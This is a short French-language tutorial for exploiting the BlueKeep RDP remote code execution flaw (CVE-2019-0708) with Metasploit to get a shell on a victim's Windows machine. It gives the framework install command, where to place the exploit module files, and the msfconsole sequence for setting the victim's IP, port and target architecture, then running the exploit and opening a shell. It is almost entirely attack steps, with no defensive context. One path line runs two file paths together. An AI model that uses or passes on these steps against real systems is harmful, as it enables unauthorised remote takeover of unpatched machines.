
CVE-2019-0708 RCE Tutoriel d'exécution de code à distance pour obtenir un shell
Installation et mise à jour sur Kali :
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Téléchargez le kit d'attaque et placez les fichiers dans les dossiers correspondants de Metasploit (si des fichiers du même nom existent déjà, remplacez-les directement).
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb ->
->
/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbcve_2019_0708_bluekeep_rce.rb/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rbProcédure d'exploitation :
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Utilisez set RHOSTS [IP_de_la_victime] pour définir l'adresse IP de la machine cible.
Utilisez set RPORT [PORT_de_la_victime] pour définir le port RDP de la machine cible.
Utilisez set target [nombre_ID] (peut être 0-4) pour définir l'architecture de la machine cible.
set target=3
exploit
shell
